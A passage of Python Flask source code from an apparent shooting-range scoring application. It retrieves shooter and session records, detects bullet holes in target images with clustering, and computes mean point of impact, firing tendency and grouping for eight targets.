set_3_x_arr.append(int(x_3.final_x))
for y_3 in set_3_y:
set_3_y_arr.append(int(y_3.final_y))
set_4_x=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==8 , T_Firer_Details.set_no==4 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
set_4_y=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==8 , T_Firer_Details.set_no==4 ,T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
for x_4 in set_4_x:
set_4_x_arr.append(int(x_4.final_x))
for y_4 in set_4_y:
set_4_y_arr.append(int(y_4.final_y))
set_1_id = db.session.query(T_Firer_Details.firer_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==8,
T_Firer_Details.set_no==1,
T_Firer_Details.paper_ref==paper_ref,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_1_session_no=db.session.query(T_Firer_Details.session_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==8,
T_Firer_Details.set_no==1,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_1_detail_no=db.session.query(T_Firer_Details.detail_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==8,
T_Firer_Details.set_no==1,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_1_name=db.session.query(Shooter.name).filter(
Shooter.id==set_1_id
).scalar()
set_1_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_1_id).scalar()
set_2_id = db.session.query(T_Firer_Details.firer_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==8,
T_Firer_Details.set_no==2,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_2_session_no=db.session.query(T_Firer_Details.session_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==8,
T_Firer_Details.set_no==2,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_2_detail_no=db.session.query(T_Firer_Details.detail_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==8,
T_Firer_Details.set_no==2,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_2_name=db.session.query(Shooter.name).filter(
Shooter.id==set_2_id
).scalar()
set_2_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_2_id).scalar()
set_3_id = db.session.query(T_Firer_Details.firer_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==8,
T_Firer_Details.set_no==3,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_3_session_no=db.session.query(T_Firer_Details.session_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==8,
T_Firer_Details.set_no==3,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_3_detail_no=db.session.query(T_Firer_Details.detail_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==8,
T_Firer_Details.set_no==3,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_3_name=db.session.query(Shooter.name).filter(
Shooter.id==set_3_id
).scalar()
set_3_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_3_id).scalar()
set_4_id = db.session.query(T_Firer_Details.firer_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==8,
T_Firer_Details.set_no==4,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_4_session_no=db.session.query(T_Firer_Details.session_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==8,
T_Firer_Details.set_no==4,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_4_detail_no=db.session.query(T_Firer_Details.detail_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==8,
T_Firer_Details.set_no==4,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_4_name=db.session.query(Shooter.name).filter(
Shooter.id==set_4_id
).scalar()
set_4_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_4_id).scalar()
current_firer_name = db.session.query(Shooter.name).filter(Shooter.id==firer_id).scalar()
current_army_no = db.session.query(Shooter.service_id).filter(Shooter.id==firer_id).scalar()
current_session_no=db.session.query(TShooting.session_id).filter(TShooting.target_1_id==firer_id).scalar()
current_detail_no=db.session.query(TShooting.detail_no).filter(TShooting.target_1_id==firer_id).scalar()
xmpi_inch = pixeltoinch(xmpi)
ympi_inch = pixeltoinch(ympi)
xmpi_j =pd.Series(xmpi_inch).to_json(orient='values')
ympi_j =pd.Series(ympi_inch).to_json(orient='values')
Tfirt_x_j =pd.Series(Tfirt_x).to_json(orient='values')
Tfirt_y_j =pd.Series(Tfirt_y).to_json(orient='values')
for x_1 in fin_x_1:
fin_x_arr_1.append(int(x_1.final_x))
for y_1 in fin_y_1 :
fin_y_arr_1.append(int(y_1.final_y))
return jsonify(x1=t1_x ,
y1=t1_y ,
xmpi1=Tfirt_x_j ,
ympi1=Tfirt_y_j,
gp=gp,
txf1=Tfirt_x_j,
tyf1=Tfirt_y_j,
fx1=fin_x_arr_1,
fy1=fin_y_arr_1,
result_1=result_1,
fir_tendency_1=fir_tendency_1,
set_1_name=set_1_name,
current_firer_name=current_firer_name,
set_1_army=set_1_army,
current_army_no=current_army_no,
set_1_session_no=set_1_session_no,
current_session_no=current_session_no,
set_1_detail_no=set_1_detail_no,
current_detail_no=current_detail_no,
set_2_x=set_2_x_arr,
set_2_y=set_2_y_arr,
set_2_name=set_2_name,
set_2_army=set_2_army,
set_2_detail_no=set_2_detail_no,
set_2_session_no=set_2_session_no,
set_3_x=set_3_x_arr,
set_3_y=set_3_y_arr,
set_3_name=set_3_name,
set_3_army=set_3_army,
set_3_session_no=set_3_session_no,
set_3_detail_no=set_3_detail_no,
set_4_x=set_4_x_arr,
set_4_y=set_4_y_arr,
set_4_name=set_4_name,
set_4_army=set_4_army,
set_4_session_no=set_4_session_no,
set_4_detail_no=set_4_detail_no
)
@app.route('/previous_page_target_1/', methods=['GET', 'POST'])
def previous_page_target_1():
T1_name = db.session.query(Shooter.name).filter(Shooter.id==TShooting.target_1_id).scalar()
T1_service = db.session.query(Shooter.service_id).filter(Shooter.id==TShooting.target_1_id).scalar()
T1_r_id = db.session.query(Shooter.rank_id).filter(Shooter.id==TShooting.target_1_id).scalar()
T1_rank = db.session.query(Rank.name).filter(Rank.id==T1_r_id).scalar()
T2_name = db.session.query(Shooter.name).filter(Shooter.id==TShooting.target_2_id).scalar()
T2_service = db.session.query(Shooter.service_id).filter(Shooter.id==TShooting.target_2_id).scalar()
T2_r_id = db.session.query(Shooter.rank_id).filter(Shooter.id==TShooting.target_2_id).scalar()
T2_rank = db.session.query(Rank.name).filter(Rank.id==T2_r_id).scalar()
T3_name = db.session.query(Shooter.name).filter(Shooter.id==TShooting.target_3_id).scalar()
T3_service = db.session.query(Shooter.service_id).filter(Shooter.id==TShooting.target_3_id).scalar()
T3_r_id = db.session.query(Shooter.rank_id).filter(Shooter.id==TShooting.target_3_id).scalar()
T3_rank = db.session.query(Rank.name).filter(Rank.id==T3_r_id).scalar()
T4_name = db.session.query(Shooter.name).filter(Shooter.id==TShooting.target_4_id).scalar()
T4_service = db.session.query(Shooter.service_id).filter(Shooter.id==TShooting.target_4_id).scalar()
T4_r_id = db.session.query(Shooter.rank_id).filter(Shooter.id==TShooting.target_4_id).scalar()
T4_rank = db.session.query(Rank.name).filter(Rank.id==T4_r_id).scalar()
print(T1_rank)
print(T2_rank)
print(T3_rank)
print(T4_rank)
return render_template('pages/previous_page_target_1.html' ,
T1_name=T1_name,
T1_service=T1_service,
T2_name=T2_name,
T2_service=T2_service,
T3_name=T3_name,
T3_service=T3_service,
T4_name=T4_name,
T4_service=T4_service,
T4_rank=T4_rank,
T1_rank=T1_rank,
T2_rank=T2_rank,
T3_rank=T3_rank
)
@app.route('/previous_page_target_5/', methods=['GET', 'POST'])
def previous_page_target_5():
T5_name = db.session.query(Shooter.name).filter(Shooter.id==TShooting.target_5_id).scalar()
T5_service = db.session.query(Shooter.service_id).filter(Shooter.id==TShooting.target_5_id).scalar()
T5_r_id = db.session.query(Shooter.rank_id).filter(Shooter.id==TShooting.target_5_id).scalar()
T5_rank = db.session.query(Rank.name).filter(Rank.id==T5_r_id).scalar()
T6_name = db.session.query(Shooter.name).filter(Shooter.id==TShooting.target_6_id).scalar()
T6_service = db.session.query(Shooter.service_id).filter(Shooter.id==TShooting.target_6_id).scalar()
T6_r_id = db.session.query(Shooter.rank_id).filter(Shooter.id==TShooting.target_6_id).scalar()
T6_rank = db.session.query(Rank.name).filter(Rank.id==T6_r_id).scalar()
T7_name = db.session.query(Shooter.name).filter(Shooter.id==TShooting.target_7_id).scalar()
T7_service = db.session.query(Shooter.service_id).filter(Shooter.id==TShooting.target_7_id).scalar()
T7_r_id = db.session.query(Shooter.rank_id).filter(Shooter.id==TShooting.target_7_id).scalar()
T7_rank = db.session.query(Rank.name).filter(Rank.id==T7_r_id).scalar()
T8_name = db.session.query(Shooter.name).filter(Shooter.id==TShooting.target_8_id).scalar()
T8_service = db.session.query(Shooter.service_id).filter(Shooter.id==TShooting.target_8_id).scalar()
T8_r_id = db.session.query(Shooter.rank_id).filter(Shooter.id==TShooting.target_8_id).scalar()
T8_rank = db.session.query(Rank.name).filter(Rank.id==T8_r_id).scalar()
return render_template('pages/previous_page_target_5.html' ,
T5_name=T5_name,
T5_service=T5_service,
T6_name=T6_name,
T6_service=T6_service,
T7_name=T7_name,
T7_service=T7_service,
T8_name=T8_name,
T8_service=T8_service,
T5_rank=T5_rank,
T6_rank=T6_rank,
T7_rank=T7_rank,
T8_rank=T8_rank
)
def prediction_calculation_1():
curdate=time.strftime("%Y-%m-%d")
X_json=0
Y_json=0
firer_id =db.session.query(TShooting.target_1_id).scalar()
sess_id = db.session.query(TShooting.session_id).scalar()
detail_id = db.session.query(TShooting.detail_no).scalar()
target_no=1
paper_ref=db.session.query(TPaper_ref.paper_ref).scalar()
print(paper_ref )
data_x_1=db.session.query(Firer_Details).filter(Firer_Details.date==curdate , Firer_Details.target_no==1 , Firer_Details.set_no==1 , Firer_Details.paper_ref==paper_ref , Firer_Details.session_id==sess_id).all()
data_y_1=db.session.query(Firer_Details).filter(Firer_Details.date==curdate , Firer_Details.target_no==1 , Firer_Details.set_no==1 , Firer_Details.paper_ref==paper_ref , Firer_Details.session_id==sess_id).all()
print(data_x_1)
set_no=db.session.query(TShooting.set_no).scalar()
paper_ref=db.session.query(TShooting.paper_ref).scalar()
print('Old x')
print(data_x_1)
image=Image.open('E:/FRAS Windows/FRAS_production/static/img_dump/1.png')
#image=Image.open('/Users/wasifaahmed/Documents/FRAS/Fras_production_v.0.1/FRAS Windows/FRAS Windows/FRAS_production/static/img_dump/1.png')
w,h = image.size
predictedMatrix = predictAsMatrix(image,w,h)
g= Graph(80, 80, predictedMatrix)
N=g.countIslands()
points(predictedMatrix,h=80,w=80)
centroids=kmean(N,pointsarray)
print(centroids)
if(centroids is None):
x=0,
y=0,
mpit=0
xmpi1=0
ympi1=0
f1=0,
firt_x=0
firt_y=0
fir_tendency_code=""
fir_tendency_txt=""
gp_1=""
result_1=""
else:
x= centroids [:, 1]
y= 2000-centroids [:, 0]
X_json=pd.Series(x).to_json(orient='values')
Y_json = pd.Series(y).to_json(orient='values')
mpit=mpi(1,centroids)
xmpi1 = mpit [:, 1]
ympi1 = 2000-mpit [:, 0]
f1 ,firt_x,firt_y= firing_tendancy(1000, 1000 , xmpi1, ympi1)
fir_tendency_txt,fir_tendency_code = getfiringtendencytext(f1 ,firt_x,firt_y)
gp_1 = grouping_length(0 , 0 , x , y)
result_1 =getresulttext(gp_1)
return (firer_id,
sess_id,
detail_id,
target_no,
set_no,
paper_ref,
X_json,
Y_json,
xmpi1,
ympi1,
f1,
gp_1,
firt_x,
firt_y,
data_x_1,
data_y_1,
result_1,
fir_tendency_txt
)
def prediction_calculation_2():
curdate=time.strftime("%Y-%m-%d")
X_json=0
Y_json=0
firer_id =db.session.query(TShooting.target_2_id).scalar()
sess_id = db.session.query(TShooting.session_id).scalar()
detail_id = db.session.query(TShooting.detail_no).scalar()
target_no=2
paper_ref=db.session.query(TPaper_ref.paper_ref).scalar()
print(paper_ref )
data_x_1=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==2 , T_Firer_Details.set_no==1 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess_id).all()
data_y_1=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==2 , T_Firer_Details.set_no==1 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess_id).all()
print(data_x_1)
set_no=db.session.query(TShooting.set_no).scalar()
paper_ref=db.session.query(TShooting.paper_ref).scalar()
print('Old x' )
print(data_x_1)
image=Image.open('E:/FRAS Windows/FRAS_production/static/img_dump/2.png')
w,h = image.size
predictedMatrix = predictAsMatrix(image,w,h)
g= Graph(80, 80, predictedMatrix)
N=g.countIslands()
points(predictedMatrix,h=80,w=80)
centroids=kmean(N,pointsarray)
if(centroids is None):
x=0,
y=0,
mpit=0
xmpi1=0
ympi1=0
f1=0,
firt_x=0
firt_y=0
fir_tendency_code=""
fir_tendency_txt=""
gp_1=""
result_1=""
else:
x= centroids [:, 1]
y= 2000-centroids [:, 0]
X_json=pd.Series(x).to_json(orient='values')
Y_json = pd.Series(y).to_json(orient='values')
mpit=mpi(1,centroids)
xmpi1 = mpit [:, 1]
ympi1 = 2000-mpit [:, 0]
f1 ,firt_x,firt_y= firing_tendancy(1000, 1000 , xmpi1, ympi1)
fir_tendency_txt,fir_tendency_code = getfiringtendencytext(f1 ,firt_x,firt_y)
gp_1 = grouping_length(0 , 0 , x , y)
result_1 =getresulttext(gp_1)
return (firer_id,
sess_id,
detail_id,
target_no,
set_no,
paper_ref,
X_json,
Y_json,
xmpi1,
ympi1,
f1,
gp_1,
firt_x,
firt_y,
data_x_1,
data_y_1,
result_1,
fir_tendency_txt
)
def prediction_calculation_3():
X_json=0
Y_json=0
curdate=time.strftime("%Y-%m-%d")
firer_id =db.session.query(TShooting.target_3_id).scalar()
sess_id = db.session.query(TShooting.session_id).scalar()
detail_id = db.session.query(TShooting.detail_no).scalar()
target_no=3
paper_ref=db.session.query(TPaper_ref.paper_ref).scalar()
print(paper_ref)
data_x_1=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==3 , T_Firer_Details.set_no==1 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess_id).all()
data_y_1=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==3 , T_Firer_Details.set_no==1 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess_id).all()
print(data_x_1)
set_no=db.session.query(TShooting.set_no).scalar()
paper_ref=db.session.query(TShooting.paper_ref).scalar()
print('Old x' )
print(data_x_1)
image=Image.open('E:/FRAS Windows/FRAS_production/static/img_dump/3.png')
w,h = image.size
predictedMatrix = predictAsMatrix(image,w,h)
g= Graph(80, 80, predictedMatrix)
N=g.countIslands()
points(predictedMatrix,h=80,w=80)
centroids=kmean(N,pointsarray)
if(centroids is None):
x=0,
y=0,
mpit=0
xmpi1=0
ympi1=0
f1=0,
firt_x=0
firt_y=0
fir_tendency_code=""
fir_tendency_txt=""
gp_1=""
result_1=""
else:
x= centroids [:, 1]
y= 2000-centroids [:, 0]
X_json=pd.Series(x).to_json(orient='values')
Y_json = pd.Series(y).to_json(orient='values')
mpit=mpi(1,centroids)
xmpi1 = mpit [:, 1]
ympi1 = 2000-mpit [:, 0]
f1 ,firt_x,firt_y= firing_tendancy(1000, 1000 , xmpi1, ympi1)
fir_tendency_txt,fir_tendency_code = getfiringtendencytext(f1 ,firt_x,firt_y)
print("calling from prediction_calculation_1" )
gp_1 = grouping_length(0 , 0 , x , y)
result_1 =getresulttext(gp_1)
return (firer_id,
sess_id,
detail_id,
target_no,
set_no,
paper_ref,
X_json,
Y_json,
xmpi1,
ympi1,
f1,
gp_1,
firt_x,
firt_y,
data_x_1,
data_y_1,
result_1,
fir_tendency_txt
)
def prediction_calculation_4():
curdate=time.strftime("%Y-%m-%d")
firer_id =db.session.query(TShooting.target_4_id).scalar()
sess_id = db.session.query(TShooting.session_id).scalar()
detail_id = db.session.query(TShooting.detail_no).scalar()
target_no=4
paper_ref=db.session.query(TPaper_ref.paper_ref).scalar()
print(paper_ref )
data_x_1=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==4 , T_Firer_Details.set_no==1 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess_id).all()
data_y_1=db.session.query(T_Firer_Details.final_y).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==4 , T_Firer_Details.set_no==1 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess_id).all()
print(data_x_1)
set_no=db.session.query(TShooting.set_no).scalar()
paper_ref=db.session.query(TShooting.paper_ref).scalar()
print('Old x' )
print(data_x_1)
image=Image.open('E:/FRAS Windows/FRAS_production/static/img_dump/4.png')
w,h = image.size
predictedMatrix = predictAsMatrix(image,w,h)
g= Graph(80, 80, predictedMatrix)
N=g.countIslands()
points(predictedMatrix,h=80,w=80)
centroids=kmean(N,pointsarray)
if(centroids is None):
x=0,
y=0,
mpit=0
xmpi1=0
ympi1=0
f1=0,
firt_x=0
firt_y=0
fir_tendency_code=""
fir_tendency_txt=""
gp_1=""
result_1=""
else:
x= centroids [:, 1]
y= 2000-centroids [:, 0]
X_json=pd.Series(x).to_json(orient='values')
Y_json = pd.Series(y).to_json(orient='values')
mpit=mpi(1,centroids)
xmpi1 = mpit [:, 1]
ympi1 = 2000-mpit [:, 0]
f1 ,firt_x,firt_y= firing_tendancy(1000, 1000 , xmpi1, ympi1)
fir_tendency_txt,fir_tendency_code = getfiringtendencytext(f1 ,firt_x,firt_y)
print("calling from prediction_calculation_1" )
gp_1 = grouping_length(0 , 0 , x , y)
result_1 =getresulttext(gp_1)
return (firer_id,
sess_id,
detail_id,
target_no,
set_no,
paper_ref,
X_json,
Y_json,
xmpi1,
ympi1,
f1,
gp_1,
firt_x,
firt_y,
data_x_1,
data_y_1,
result_1,
fir_tendency_txt
)
def prediction_calculation_5():
curdate=time.strftime("%Y-%m-%d")
firer_id =db.session.query(TShooting.target_5_id).scalar()
sess_id = db.session.query(TShooting.session_id).scalar()
detail_id = db.session.query(TShooting.detail_no).scalar()
target_no=5
paper_ref=db.session.query(TPaper_ref.paper_ref).scalar()
print(paper_ref)
data_x_1=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==5 , T_Firer_Details.set_no==1 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess_id).all()
data_y_1=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==5 , T_Firer_Details.set_no==1 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess_id).all()
print(data_x_1)
set_no=db.session.query(TShooting.set_no).scalar()
paper_ref=db.session.query(TShooting.paper_ref).scalar()
print('Old x' )
print(data_x_1)
image=Image.open('E:/FRAS Windows/FRAS_production/static/img_dump/5.png')
w,h = image.size
predictedMatrix = predictAsMatrix(image,w,h)
g= Graph(80, 80, predictedMatrix)
N=g.countIslands()
points(predictedMatrix,h=80,w=80)
centroids=kmean(N,pointsarray)
if(centroids is None):
x=0,
y=0,
mpit=0
xmpi1=0
ympi1=0
f1=0,
firt_x=0
firt_y=0
fir_tendency_code=""
fir_tendency_txt=""
gp_1=""
result_1=""
else:
x= centroids [:, 1]
y= 2000-centroids [:, 0]
X_json=pd.Series(x).to_json(orient='values')
Y_json = pd.Series(y).to_json(orient='values')
mpit=mpi(1,centroids)
xmpi1 = mpit [:, 1]
ympi1 = 2000-mpit [:, 0]
f1 ,firt_x,firt_y= firing_tendancy(1000, 1000 , xmpi1, ympi1)
fir_tendency_txt,fir_tendency_code = getfiringtendencytext(f1 ,firt_x,firt_y)
print("calling from prediction_calculation_1" )
gp_1 = grouping_length(0 , 0 , x , y)
result_1 =getresulttext(gp_1)
return (firer_id,
sess_id,
detail_id,
target_no,
set_no,
paper_ref,
X_json,
Y_json,
xmpi1,
ympi1,
f1,
gp_1,
firt_x,
firt_y,
data_x_1,
data_y_1,
result_1,
fir_tendency_txt
)
def prediction_calculation_6():
curdate=time.strftime("%Y-%m-%d")
firer_id =db.session.query(TShooting.target_6_id).scalar()
sess_id = db.session.query(TShooting.session_id).scalar()
detail_id = db.session.query(TShooting.detail_no).scalar()
target_no=6
paper_ref=db.session.query(TPaper_ref.paper_ref).scalar()
print(paper_ref)
data_x_1=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==6 , T_Firer_Details.set_no==1 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess_id).all()
data_y_1=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==6 , T_Firer_Details.set_no==1 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess_id).all()
print(data_x_1)
set_no=db.session.query(TShooting.set_no).scalar()
paper_ref=db.session.query(TShooting.paper_ref).scalar()
print('Old x' )
print(data_x_1)
image=Image.open('E:/FRAS Windows/FRAS_production/static/img_dump/6.png')
w,h = image.size
predictedMatrix = predictAsMatrix(image,w,h)
g= Graph(80, 80, predictedMatrix)
N=g.countIslands()
points(predictedMatrix,h=80,w=80)
centroids=kmean(N,pointsarray)
if(centroids is None):
x=0,
y=0,
mpit=0
xmpi1=0
ympi1=0
f1=0,
firt_x=0
firt_y=0
fir_tendency_code=""
fir_tendency_txt=""
gp_1=""
result_1=""
else:
x= centroids [:, 1]
y= 2000-centroids [:, 0]
X_json=pd.Series(x).to_json(orient='values')
Y_json = pd.Series(y).to_json(orient='values')
mpit=mpi(1,centroids)
xmpi1 = mpit [:, 1]
ympi1 = 2000-mpit [:, 0]
f1 ,firt_x,firt_y= firing_tendancy(1000, 1000 , xmpi1, ympi1)
fir_tendency_txt,fir_tendency_code = getfiringtendencytext(f1 ,firt_x,firt_y)
print("calling from prediction_calculation_1" )
gp_1 = grouping_length(0 , 0 , x , y)
result_1 =getresulttext(gp_1)
return (firer_id,
sess_id,
detail_id,
target_no,
set_no,
paper_ref,
X_json,
Y_json,
xmpi1,
ympi1,
f1,
gp_1,
firt_x,
firt_y,
data_x_1,
data_y_1,
result_1,
fir_tendency_txt
)
def prediction_calculation_7():
curdate=time.strftime("%Y-%m-%d")
firer_id =db.session.query(TShooting.target_7_id).scalar()
sess_id = db.session.query(TShooting.session_id).scalar()
detail_id = db.session.query(TShooting.detail_no).scalar()
target_no=7
paper_ref=db.session.query(TPaper_ref.paper_ref).scalar()
print(paper_ref)
data_x_1=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==7 , T_Firer_Details.set_no==1 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess_id).all()
data_y_1=db.session.query(T_Firer_Details.final_y).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==7 , T_Firer_Details.set_no==1 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess_id).all()
print(data_x_1)
set_no=db.session.query(TShooting.set_no).scalar()
paper_ref=db.session.query(TShooting.paper_ref).scalar()
print('Old x' )
print(data_x_1)
image=Image.open('E:/FRAS Windows/FRAS_production/static/img_dump/7.png')
w,h = image.size
predictedMatrix = predictAsMatrix(image,w,h)
g= Graph(80, 80, predictedMatrix)
N=g.countIslands()
points(predictedMatrix,h=80,w=80)
centroids=kmean(N,pointsarray)
if(centroids is None):
x=0,
y=0,
mpit=0
xmpi1=0
ympi1=0
f1=0,
firt_x=0
firt_y=0
fir_tendency_code=""
fir_tendency_txt=""
gp_1=""
result_1=""
else:
x= centroids [:, 1]
y= 2000-centroids [:, 0]
X_json=pd.Series(x).to_json(orient='values')
Y_json = pd.Series(y).to_json(orient='values')
mpit=mpi(1,centroids)
xmpi1 = mpit [:, 1]
ympi1 = 2000-mpit [:, 0]
f1 ,firt_x,firt_y= firing_tendancy(1000, 1000 , xmpi1, ympi1)
fir_tendency_txt,fir_tendency_code = getfiringtendencytext(f1 ,firt_x,firt_y)
print("calling from prediction_calculation_1" )
gp_1 = grouping_length(0 , 0 , x , y)
result_1 =getresulttext(gp_1)
return (firer_id,
sess_id,
detail_id,
target_no,
set_no,
paper_ref,
X_json,
Y_json,
xmpi1,
ympi1,
f1,
gp_1,
firt_x,
firt_y,
data_x_1,
data_y_1,
result_1,
fir_tendency_txt
)
def prediction_calculation_8():
session.clear()
curdate=time.strftime("%Y-%m-%d")
firer_id =db.session.query(TShooting.target_8_id).scalar()
sess_id = db.session.query(TShooting.session_id).scalar()
detail_id = db.session.query(TShooting.detail_no).scalar()
target_no=8
paper_ref=db.session.query(TPaper_ref.paper_ref).scalar()
print(paper_ref)
data_x_1=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==8 , T_Firer_Details.set_no==1 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess_id).all()
data_y_1=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==8 , T_Firer_Details.set_no==1 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess_id).all()
print(data_x_1)
set_no=db.session.query(TShooting.set_no).scalar()
paper_ref=db.session.query(TShooting.paper_ref).scalar()
print('Old x' )
print(data_x_1)
image=Image.open('E:/FRAS Windows/FRAS_production/static/img_dump/8.png')
w,h = image.size
predictedMatrix = predictAsMatrix(image,w,h)
g= Graph(80, 80, predictedMatrix)
N=g.countIslands()
points(predictedMatrix,h=80,w=80)
centroids=kmean(N,pointsarray)
if(centroids is None):
x=0,
y=0,
mpit=0
xmpi1=0
ympi1=0
f1=0,
firt_x=0
firt_y=0
fir_tendency_code=""
fir_tendency_txt=""
gp_1=""
result_1=""
else:
x= centroids [:, 1]
y= 2000-centroids [:, 0]
X_json=pd.Series(x).to_json(orient='values')
Y_json = pd.Series(y).to_json(orient='values')
mpit=mpi(1,centroids)
xmpi1 = mpit [:, 1]
ympi1 = 2000-mpit [:, 0]
f1 ,firt_x,firt_y= firing_tendancy(1000, 1000 , xmpi1, ympi1)
fir_tendency_txt,fir_tendency_code = getfiringtendencytext(f1 ,firt_x,firt_y)
print("calling from prediction_calculation_1" )
gp_1 = grouping_length(0 , 0 , x , y)
result_1 =getresulttext(gp_1)
return (firer_id,
sess_id,
detail_id,
target_no,
set_no,
paper_ref,
X_json,
Y_json,
xmpi1,
ympi1,
f1,
gp_1,
firt_x,
firt_y,
data_x_1,
data_y_1,
result_1,
fir_tendency_txt
)
@app.route('/save_adhoc_1/', methods=['GET', 'POST'])
def save_adhoc_1():
return redirect(url_for('previous_page_target_1'))
@app.route('/save_1/', methods=['GET', 'POST'])
def save_call_1():
print("this is save_call_1",file=sys.stderr)
final_x=[]
final_y=[]
tend_f_x_t = None
tend_f_y_t = None
x_list=None
y_list=None
if request.method == 'POST':
curr_date=date.today()
firer_id,session_id,detail_no,target_no,set_no,paper_no,x,y,mx1,my1,tendency,grouping_length,firt_x,firt_y,o,p,result,f=prediction_calculation_1()
t1= session.get('tmpi',None)
Tupdate=db.session.query(TShooting).scalar()
if(Tupdate.save_flag==1):
return render_template('errors/error_save.html')
else:
print("t1",file=sys.stderr)
print(t1,file=sys.stderr)
print(f,file=sys.stderr)
if(t1 is None):
f_mpix_1=0
else:
f_mpix_1 = t1[ : 1 ]
f_mpiy_1=t1[ : 0 ]
final_x_1 = session.get('x1', None)
final_y_1 = session.get('y1', None)
print(session.get('x1'),file=sys.stderr)
print("final_x_1",file=sys.stderr)
print(final_x_1,file=sys.stderr)
gp_1_f=session.get('gp_u_1', None)
res_u_1=session.get('res_u_1',None)
tend_f = session.get('tf_u_1', None)
tend_f_x = session.get('tfirer_x1', None)
tend_f_y = session.get('tfirer_y1', None)
tend_f_x_1 = session.get('tfirer_x1_f', None)
tend_f_y_1 = session.get('tfirer_y1_f', None)
if (x==0):
x=0
y=0
else:
x_len=len(x)
y_len=len(y)
x_ss=x[1:x_len-1]
y_ss=y[1:y_len-1]
x_split = x_ss.split(",")
y_split = y_ss.split(",")
x_list=[]
y_list=[]
for x_t in x_split:
x_list.append(float(x_t))
for y_t in y_split:
y_list.append(float(y_t))
print(final_x_1,file=sys.stderr)
box = savein_db(firer_id,session_id,detail_no,target_no,set_no,paper_no,x_list,y_list,final_x_1,final_y_1)
mpi=savempi_db(detail_no,target_no,paper_no,firer_id,firt_x,firt_y,tendency,session_id,set_no,tend_f,tend_f_x ,tend_f_y,tend_f_x_1,tend_f_y_1,f)
gp=savegp_db(firer_id,session_id,detail_no,target_no,set_no,paper_no,grouping_length,gp_1_f,res_u_1,result)
Tupdate.save_flag=1
db.session.commit()
Supdate=db.session.query(Session_Detail).filter(
Session_Detail.session_id==session_id,
Session_Detail.detail_no==detail_no
).scalar()
Supdate.save_flag=1
print(Supdate)
db.session.commit()
image_save=save_image_1(firer_id)
image = image_record(
date=time.strftime("%Y-%m-%d"),
